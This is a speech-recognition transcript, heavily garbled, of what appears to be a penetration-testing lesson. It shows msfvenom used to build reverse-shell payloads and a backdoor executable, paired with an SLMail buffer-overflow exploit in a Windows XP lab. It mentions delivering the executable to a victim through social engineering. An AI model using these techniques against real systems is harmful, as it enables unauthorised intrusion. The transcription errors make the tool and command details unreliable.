Hello, everybody. Welcome to the episode number 23 off the speakers, my Rispoli framework and an MSF Banham.
My name is Alejandro Gina, and I'll be instructor for today's session.
The learning object IBS of the session is to understand the concept behind this attack and I fly the techniques to implement this attack. So let's get down to business shall way.
First of all, uh, we already saw some
basics of the MSF medicinally framework or the MSF counsel. Ah, but let me go a little bit deeper in that knowledge by, you know, using the MSF Banham module off the medicine framework.
Remember that in the previous video for using public exploits,
remember that we saw pulling exploit to actually use are exploitable Nabili a buffer overflow Belman ability
in Ah, the SL mail server.
Let's use that just Thio, see how a king we can, you know, actually use Emma's abandon to get what we won.
let's use Let me first.
I started this on just another here. Uh, just thio, remember? Just show you so you can remember that exploit that we use before. Um,
I can't remember. Well, let's go to our
and let's search for
SL mail. Remember that we're all of his with We actually did all of this in the previous video. So
638 It should be there. Okay.
And, you know, they leave, We call it, exploit that fighting. And there you go. Remember, that would change their return address.
Uh, how about remember that when we actually execute that,
we, uh, created a buying chill. Um,
with this exploit. And it was, you know, create It was
great. And by buying chill in port 4444 How about if we actually want to create a reversal import 12 tree for Well, we just need to change that.
We can as you can. Well, in the previous video, we use a public exploit, but we actually
we can actually also use medicine. Plato achieved exact same thing. Let me just
give you for example, we can just search eso mail here,
and we quickly found on exploit. So just copy, use
and it just, you know, eunice did to enter the remote host and SL mail. It's actually ah, proved on all of this. If I go to show targets, it will just tell me the same thing.
The point is that if we actually go to this, um,
toward this is created. Remember, all of the exploits in In in the Medicis played framework are great. And in pearled. So this pearl a script already has. I mean, it will first detect the operating system. And whatever the operating system is, it will change the return address.
So remember that this is all created in Pearl. So
Yeah, that's the thing we just said. The remote host.
to the windows XB, where the cellular service Rhine. And we just hit. Run
it will. You know, here you go trying windows as a male, and it will detect the upper system and get us our shelf.
So yeah, that easy, huh? Um,
yeah, I want to kill that.
Okay. About that anymore. So yeah, but what about you actually
went to modify the Brutus exploit we used with the bullet explodes session.
We could actually do that with MSF. Benham. Emits of enemy is a menace. Boyfriend war, too, that you can use to actually create your own exploits or your own payloads to be more specific, not exploits, but payloads s o. You can achieve whatever you want
and your exploits. For example, you downloaded a public exploits, and you can
as we're going to do in this video. And you don't actually want to execute the ***. Same payload. You want to create your own payload? You can do that with MSF banner. So let me just
type here. MSF Benham,
then the payload. Actually, the paler I want to be. Remember that? Itwas ah, bine shell. Not I want to be a reverse shell.
And then the listening host, which will be my colleague machine, Of course.
Then the listening port, which let's change it to went to true four, maybe for someplace important for four for four Wasn't working for us
Um, we wouldn't call it trip. This is basically just to tell it to the exploit that whenever that the service or just created or, you know, the one that we're actually attaching this paler to is going to fail. It changed to the next one, or um
so we cannot crash the service.
For example, if you don't put that it's most likely that or SML server it will. It will get us a river shell. But the SM I certainly will not work so that
that could be a little bit noisy
then the function. I want to be C because I want to actually just replaced all of this with my payload
That's nice platform.
When those, of course.
then we can set some bad characters. All of this will make a little bit more sense When when We see, um um the
before awful for module. But, you know, sometimes when you're creating that and you're actually executed, the payload if you're actually
using some backtracked, is, for example, the character of new, which is represented by the hex code X zero. It can terminate your command or do you know your steps? For example, if you're trying to get a reverse shell
and you know something is being executed, if it finds a new character or a return carriage character,
he could end execution, or you can, you know, mess up the execution process so way need to avoid these characters how to find them. We'll see that again in the menace. Um,
I'm sorry for all the probe modules.
Okay, we don't want to use this part. Where characters for one creating on exploit and encoding will use she kattegat nine. I'm hoping that's the correct way to say it.
This is just an encoder that I will die without you working windows. But that's it.
And we hit enter, and it's supposed to create or exploit from here.
And there you go. Ah, this is very important rumor that the bites the length of the bites. But I can just, you know,
Remember, I already modified dumb the return address. Let me just eliminate all of this so you could see how we can actually d'oh
and just copy Just paste. I'm sorry.
Ah, whatever. It was inside of four payload,
And just hopes just equal. Stupid. Okay, It's equals two. And, um, now we just need to save it.
And remember that we actually said that will be listening. Import for 1234
So let's fire up a listener here.
I'm sorry. Well, let's fire up in displaced in
before, and we'll listen for connections. And then just remember that we modify this
and just execute the ex, actually, execute the expert.
and, yeah, we got a reverse shelling here.
So this is how powerful and Mr Bennett could be
in the previous service in the previous exploit, the surface was crashing after first successful attempt. However, you know, as I told you, we used the exact function to generate a more stable exploit. The service is still works If I, you know, kill this, sir, my listener again
and just performed. This excites same thing.
You will get me a reversal once again. So, you know, the service consistent continues being functional, so we can, you know, buy some time in there and and maybe go. I'm not this for for the administration, Tim.
So that's the beauty and the powered off the ends of Ben. Um MSF
Benham to weaken, send, act like, you know, we can send the link to our service to our victim, For example. What if you want to create, Let me just exiting here. Oh, my God. Um, what do you want To create? An execute a ble, for example.
So you can actually get the sacks in command?
You know, ***. Same payload listening host. Listen, import, let me just change that for the purpose of this exercise
for 1 to 2, I don't know, something like that. Um, and, uh, actually, I don't want to be in a in a
see for money, but I want to be in the next performance excusable foreman, and I just tell it to 72 or wet root, for example. Uh
and we save it to that. And by social engineering or something like that, we were sent back to her to her victim.
Remember that we're your Windows XB machine.
And he was, uh, reverse.
The t x t come. Sorry that that excess
and it unloaded that. And we can just, uh, let me just start fire. Ah, listening here.
What was the Port high were 1 to 2.
And as soon as I just opened up in that
Yeah, run. It will get us a river shell back to us,
so yeah, you can see
again. We're in the Windows machine. So this is how powerful? Uh, you know
how neat thing Nice and cool in whatever adjective you want to give it to you, Mr Benham, but yeah, You can do what everyone. What if you want. You don't want Thio. Maybe you're just messing up with a body or something like that. Uh, you and to actually, you know, want to get a reversal.
All you want to do is to I don't know,
for example, something silly like that just changed the payload in here.
Something silly like, um,
opening the calculator.
Something like that. I don't know. I'm just thinking out loud, Matt, right now. So, windows,
um, except to execute right, CMD equals *** that exit.
So I'm just creating a payload to up with the kike later on, and I'm living the same us it is. So
actually execute that
we just generate that if I go to my windows ex speak in just pretty here when you're 60
exit, you know, it's a nothing. Yeah, you wanna run it? And boom or calculator Wes happened. So you know, that's you know how you can modify exploits. You can create your your own payload. Maybe you, us. We did in this in this video, we'll really have a polling exploit,
and we just needed to modify it. Um,
we can use all of that. We can use whatever exploit. Now, what exploits can you use? Well, you can quickly surf the internet for that. You can just
four of the MSF console, so we can see you get you can actually help many pay loots you can actually use, which is a lot. I mean, I just showed you three different payloads and two different Baylor's to be more precise reversal. But you can create buying shells you can create,
um, matter predator reverse shell. So we can you know you're
capabilities in the big Temple. Because at the end, the MSF Banham Demas him himself. I'm sorry. The matter predator shell is way better than a normal show, right? So let me just show pay loads here
and you can see there's a lot of a losing their, uh all of this pales can be used in Emma's of Benham, and you can create your own payloads. Uh, the fun part of this is that maybe there's, you know, you have a payload, but you don't have an exploit on the MSF MSF counsel.
So the point is that you, king, actually, uh,
not use the Amazon Council because maybe there's note and exploit in there. So you found an exploit on on
They're not exploitive e, for example, that always on, and you just need to modify the payload, or you just need to modify something else. So this is the beauty about a Mr Benham and the combination with the MSF counsel. For example, if you want to creates again a minor praetor shell, um,
and you can actually start a major affair releasing her on the MSF counsel
that will boost your your knowledge and and you and your capabilities on the victim machine.
Can you generate backdoors in an executed or four months with Emma's? A ban? Um, yeah, you can. You definitely can. Can we actually get a remote control for this attack? Yeah, definitely. Can Again. And you can actually start Calculator is wealth.
Um uh, this video will learn some concepts behind this attack. And we implemented some techniques to execute this attack to create payloads basically,
and we sell how malicious diseases that can be, Ah, supplemental materials. There's a new material here, you know. They have the hacker playbook. That's always ah, go to. But now we have the menace fully unleashed the reference for the MSF battle module. You can you can find a lot of good information
techniques. And how do you actually use,
um, more capabilities from the MSF Benham? And you know, uh, again every possible source in Google and YouTube
and looking forward in the next video will cover tunneling. Well, that's it for today, folks, I hope in your the video and talk to you soon.